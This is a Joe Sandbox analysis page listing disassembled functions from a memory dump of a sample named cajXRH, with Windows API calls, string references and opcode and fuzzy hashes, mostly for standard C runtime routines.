Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200

Function 000000014000F680 Relevance: 9.2, APIs: 6, Instructions: 204COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 319667368-0
Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300

Function 000000014000ADE0 Relevance: 9.2, APIs: 6, Instructions: 167COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E

Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151

MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 1390108997-0
Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340

Function 00007FFE13204CD4 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 319COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE13204E72
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE1320519B

Strings

csm, xrefs: 00007FFE13204DB9
csm, xrefs: 00007FFE13204E1B
csm, xrefs: 00007FFE13204E99

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
Instruction ID: 7ee3fd7e733d4e74fec9409c955775a149389a7590508d8a8ab1853f49e5f17f
Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
Instruction Fuzzy Hash: DDE1B572908B818EE710AF26D4803BD77A0FBA5B68F144175DB9D67666CF38E489C740

Function 00007FFE132095BC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FFE13208BC9,?,?,?,?,00007FFE13208C14), ref: 00007FFE132095CB
FlsSetValue.KERNEL32(?,?,?,00007FFE13208BC9,?,?,?,?,00007FFE13208C14), ref: 00007FFE13209601
FlsSetValue.KERNEL32(?,?,?,00007FFE13208BC9,?,?,?,?,00007FFE13208C14), ref: 00007FFE1320962E
FlsSetValue.KERNEL32(?,?,?,00007FFE13208BC9,?,?,?,?,00007FFE13208C14), ref: 00007FFE1320963F
FlsSetValue.KERNEL32(?,?,?,00007FFE13208BC9,?,?,?,?,00007FFE13208C14), ref: 00007FFE13209650
SetLastError.KERNEL32(?,?,?,00007FFE13208BC9,?,?,?,?,00007FFE13208C14), ref: 00007FFE1320966B

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
Instruction ID: 864a79f61816f30d9f744385e111a96ec7447dcc6a65e85cacf4777a2a4f9cec
Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
Instruction Fuzzy Hash: ED114A20B0CE428EFA64B763569113E65529FE8BB0F4447B5E93F366F6DE6CE449C200

Function 0000000140013850 Relevance: 9.0, APIs: 6, Instructions: 18synchronizationCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014001385B
LeaveCriticalSection.KERNEL32 ref: 0000000140013872
SetEvent.KERNEL32 ref: 000000014001387F
WaitForSingleObject.KERNEL32 ref: 0000000140013891
CloseHandle.KERNEL32 ref: 000000014001389E
CloseHandle.KERNEL32 ref: 00000001400138AB

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
String ID:
API String ID: 3326452711-0
Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705

Function 0000000140003790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 00000001400037D3
#4.VSELOG ref: 0000000140003823
EnterCriticalSection.KERNEL32 ref: 000000014000382F
LeaveCriticalSection.KERNEL32 ref: 00000001400038B7

Strings

amps_Exec: pHandle=%p, execId=%d, iParam=%d, xrefs: 000000014000380B

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTimerWaitable
String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
API String ID: 2984211723-1229430080
Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740

Function 00007FFE13207F28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FFE13207F4D
GetProcAddress.KERNEL32 ref: 00007FFE13207F63
FreeLibrary.KERNEL32 ref: 00007FFE13207F8A

Strings

CorExitProcess, xrefs: 00007FFE13207F5C
mscoree.dll, xrefs: 00007FFE13207F44

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
Instruction ID: ebba7c17654feb8c5a842861a7653ecb2dfffcc07ba7b36a94c37c568f59e85f
Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
Instruction Fuzzy Hash: 5FF0C261B18F0689EB10AB26E4443396320AFE9B70F540375DA6D566F5CF2CD049C300

Function 0000000140008510 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
ExitProcess.KERNEL32 ref: 0000000140008545

Strings

CorExitProcess, xrefs: 000000014000852A
mscoree.dll, xrefs: 0000000140008518

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: AddressExitHandleModuleProcProcess
String ID: CorExitProcess$mscoree.dll
API String ID: 75539706-1276376045
Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340

Function 00007FFE132040D4 Relevance: 7.8, APIs: 5, Instructions: 290COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 00007FFE132041F7
__AdjustPointer.LIBCMT ref: 00007FFE13204242

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
Instruction ID: 6f6fa632d4a09f0b22d7ea56d52526b5440f7cdd38b60465b1c6fa3688516bc7
Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
Instruction Fuzzy Hash: 5BB1A021A0AE428DEA65FB53944023D66A0AFF4BA4F19C4B5DE4C377A5DE3CE449CB40

Function 0000000140009F50 Relevance: 7.7, APIs: 5, Instructions: 208COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32 ref: 0000000140009F76

Part of subcall function 0000000140008370: Sleep.KERNEL32(?,?,00000000,0000000140005545), ref: 00000001400083C0

GetFileType.KERNEL32 ref: 000000014000A11C

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: FileInfoSleepStartupType
String ID:
API String ID: 1527402494-0
Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301

Function 0000000140009E30 Relevance: 7.6, APIs: 5, Instructions: 74COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E3E
GetLastError.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E5E
GetCommandLineA.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E9B
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009EBB

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: CommandLine$ByteCharErrorLastMultiWide
String ID:
API String ID: 3078728599-0
Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00

Function 000000014000FD50 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDAC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDC7

Part of subcall function 0000000140010B30: CreateFileA.KERNEL32 ref: 0000000140010B5A

GetConsoleOutputCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDDC
WideCharToMultiByte.KERNEL32 ref: 000000014000FE0D
WriteConsoleA.KERNEL32 ref: 000000014000FE32

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
String ID:
API String ID: 1850339568-0
Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00

Function 00007FFE1320FB54 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FFE1320FB7C
_set_statfp.LIBCMT ref: 00007FFE1320FB97
_set_statfp.LIBCMT ref: 00007FFE1320FBB3
_set_statfp.LIBCMT ref: 00007FFE1320FBEF

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
Instruction ID: 458284781289daed9fbb34b7da86bed918a30e164b14b60c8f36c042b95b029a
Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
Instruction Fuzzy Hash: 73110433E98E4B29F354312AE12673C10006FFC3B0F1442B0E5AE262FE9E2CA84CC900

Function 00007FFE13209684 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FFE1320766F,?,?,00000000,00007FFE1320790A,?,?,?,?,?,00007FFE13207896), ref: 00007FFE132096A3
FlsSetValue.KERNEL32(?,?,?,00007FFE1320766F,?,?,00000000,00007FFE1320790A,?,?,?,?,?,00007FFE13207896), ref: 00007FFE132096C2
FlsSetValue.KERNEL32(?,?,?,00007FFE1320766F,?,?,00000000,00007FFE1320790A,?,?,?,?,?,00007FFE13207896), ref: 00007FFE132096EA
FlsSetValue.KERNEL32(?,?,?,00007FFE1320766F,?,?,00000000,00007FFE1320790A,?,?,?,?,?,00007FFE13207896), ref: 00007FFE132096FB
FlsSetValue.KERNEL32(?,?,?,00007FFE1320766F,?,?,00000000,00007FFE1320790A,?,?,?,?,?,00007FFE13207896), ref: 00007FFE1320970C

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
Instruction ID: 63c60781ad130f443e14a1b6891a47bc712a2bef4e56b06d447b90016bf4ac51
Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
Instruction Fuzzy Hash: 29116A61B0CA424DFA68BB27A65117D65929FE47F0F5443B4E83F366F6EE2CE449C200

Function 00007FFE13209518 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FFE13209529
FlsSetValue.KERNEL32 ref: 00007FFE13209548
FlsSetValue.KERNEL32 ref: 00007FFE13209570
FlsSetValue.KERNEL32 ref: 00007FFE13209581
FlsSetValue.KERNEL32 ref: 00007FFE13209592

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
Instruction ID: 6c10db60c7baa1ec6f11d5a73051852661f67296fe9ca5fc5aba5ac45ae8fa40
Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
Instruction Fuzzy Hash: 6211D650B0DA464EFAA8B6A3545217D59918FE4770E5407B4D93F3A2F3ED2CB449C610

Function 00007FFE13205448 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FFE132054B8
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE13205503

Strings

MOC, xrefs: 00007FFE132054CC
RCC, xrefs: 00007FFE132054D4

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
Instruction ID: 8951c0f60ec2cf77faaf2b17432a2aff8c3767b91d5969cd6be4098219279403
Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
Instruction Fuzzy Hash: 1B91A173A08B85CEE710EB66D4402AD7BA0FB94798F24417AEB4D27765DF38D199CB00

Function 00007FFE13203A38 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE13203A63
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE13203AFA
RtlUnwindEx.KERNEL32 ref: 00007FFE13203B54

Strings

csm, xrefs: 00007FFE13203AE1

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
Instruction ID: d07186214d5f82e317c32afe8ae9b6b92203a5ad53b6d089979b0dd3d82a8a51
